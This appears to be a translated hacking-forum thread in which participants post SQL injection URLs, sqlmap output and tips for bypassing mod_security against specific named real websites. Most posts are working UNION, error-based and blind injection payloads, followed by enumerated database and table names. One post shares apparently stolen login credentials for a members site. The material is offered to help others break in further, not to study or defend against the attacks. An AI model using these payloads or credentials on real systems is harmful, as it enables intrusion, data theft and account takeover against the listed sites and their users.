Code: http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23
MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
So where is the blind here? Or do you always rely on sqlmap alone? And yes, Mod_security is present there, so we use non-standard whitespace and wrap the operators in versioned comments (example: /*!12345union*/%0aselect)!
Sorry for the flood, but why the hell post links to vulnerable sites if you can't even do the basics of exploiting the vulnerability? And now, on topic:
Code: http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
target: http://www.tissueeng.net type: SQL Injection Code: http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+ user: tissueen_erikp@localhost version: 5.6.32-78.1-log
Spoiler
http://www.kandiusa.com/product_list.php?id=1
Database: kandiusa
+---------+---------+
| Table   | Entries |
+---------+---------+
| custom  | 8877    |
| product | 4703    |
| orderm  | 3843    |
| parts   | 597     |
| class   | 372     |
| sort    | 76      |
| wty     | 3       |
| admn    | 2       |
| reg     | 1       |
+---------+---------+
Spoiler: DB
http://www.cambridgesilversmiths.com/browse/detail.php?id=2504
available databases [48]: [*] CamSilWeb [*] Crystal [*] cs_dev_ecommSQL [*] cs_ecommSQL [*] CZOC [*] d2 [*] Data_005 [*] DATA_020 [*] DATA_021 [*] DATA_022 [*] DATA_55 [*] DATA_56 [*] DATA_999_ARCHIVE [*] DATA_ARCHIVE [*] DataLF [*] DemoSynergy [*] distribution [*] EDI_2 [*] EDI_CS_TEMP [*] EEDI_CS [*] FedEx [*] GENTRANDatabase [*] Issues [*] KS_Inbox [*] KS_Object [*] master [*] model [*] msdb [*] msllockdb [*] Northwind [*] pubs [*] PWE [*] Screens [*] Spanish [*] swWorkFlow [*] Synergy [*] TaxTables [*] tempdb [*] Ticketing [*] UPS [*] vendor_dev [*] vendor_test [*] VendorLF [*] vpEDI_Company [*] zWMS_CA [*] zWMS_dev [*] zWMS_PreMigration [*] zWMS_Test_NJ
http://www.pinoy-market.com/store.php?id=136
available databases [5]: [*] information_schema [*] mysql [*] ofertas [*] pinoy [*] test
http://www.ecgi.de/wp/wp_id.php?id=213
available databases [3]: [*] db1081552-ecgi1 [*] db1081552-ecgi2 [*] information_schema
Http://www.kupa.pl/pl/humor.php?id=16
available databases [1]: [*] baza777
// Don't flood with repetitive messages. // Combine them into 1 post, don't create extra work for the moderators // ВВ
Code: http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x556a6d655550696468517a6654417a59597750744f654b7164566e64624876594f58704345774b72,0x7170706a71),NULL,NULL,NULL,NULL,NULL-- WNxl
http://mycompaniesact.com/orders.php?id=401 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=401' AND 5514=5514 AND 'bTax'='bTax Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU --- web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0 available databases [24]: [*] cashflow [*] cashflowblog [*] cim [*] complyzone [*] complyzoneblog [*] gstcomplyzone [*] gstseekho [*] gstseekhoapp [*] information_schema [*] mppcos [*] mycompaniesact [*] mycompaniesact_blog [*] mysql [*] performance_schema [*] permier [*] phpmyadmin [*] punitecom [*] rishab [*] sammiraman [*] ssluthra [*] trackmyinvoice [*] uniqueshiksha [*] unocalecom [*] Vendor_Payment_Generation
Unfortunately yes, I'm not that strong at this, I don't even know where to start. If only there were someone to teach me)
http://www.sfgames.ru/gameS.php?id=232
Code:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=232 AND 5858=5858

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
Code: https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f585455585368634d4e6c55486a437768767250584955436345504149454674624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId= available databases [3]: [*] bbbvideo [*] information_schema [*] test
Code: http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'=' available databases [1]: [*] u7buy_dbs
Code: http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f6946495a77786d4142695a6c6b5a594c647a6b6946414657426479557962,0x71767a6b71)-- hajN
Any ideas what this site is and what it is for?
http://www.vpscro.com/cn/about.php?id=166 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=166 AND 3378=3378 Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610))) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=166 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x794e677a4367776d4c75676a55677158705a414c684b44686c4b67546f545979546e4d636c594a53,0x7178627071),NULL,NULL,NULL,NULL,NULL-- FkYN --- web server operating system: Windows 2008 or Vista web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0 back-end DBMS: MySQL >= 5.5 available databases [18]: [*] bugtracker [*] dzzoffice [*] eyao [*] hdm0130219_db [*] hdm0580028_db [*] information_schema [*] mysql [*] performance_schema [*] pigcms [*] test [*] tsoa [*] ucenter [*] uchome [*] vp_phpcms [*] vp_xcx [*] vppr [*] wecenter [*] wqjk
I can't get the columns out of the tables; whoever manages it, send the vector by PM. Accounts for logging in (it won't work without them)
Code: hopkins123:hopkins1 KlausuPirelli:pirelli1 Vishnu24:Ackbar24 momoneyg08:wordupho
Code: http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
XPATH syntax error: ':sitedepth'
http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
Duplicate entry 'sitedepth1' for key 'group_key'
tables: userman site_settings users
http://www.golf-in-japan.com/course.php?ID=372 + bd mail hach username [HIDE] https://yadi.sk/i/pxTpczCR3NmKpt [/HIDE] Code: --- Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=372 AND 5008=5008 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: ID=372 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 32 columns Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d43755072586e44506f504d575573424141775657754b625a7368574a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uzrc --- web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0 available databases [2]: [*] gij_db [*] information_schema
http://www.odontoprimegroup.com/about.php?id=4 Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: id=4' OR NOT 9339=9339# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=4' AND SLEEP(5)-- iguT --- web application technology: Apache, PHP 5.4.22 back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] information_schema [*] odonto_odo
http://remiremont.fr/associations/detail.php?id=68 Code: --- Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=68 OR SLEEP(10) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a6248755a6e67426e6c47675a546e5449546456755a7257426c534b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RzWd --- http://gloomysunday.hu/shop.php?id=9 Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-7104 OR 6087=6087# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=9 OR SLEEP(10) ---
New Jersey State Opera Code: http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user()--
Code: http://www.salut.ru/ViewTopic.php?Id=2325 http://www.salut.aero/info.php view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),version(),9,10,11,12,13,14,15,16%20--%20ccv | 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost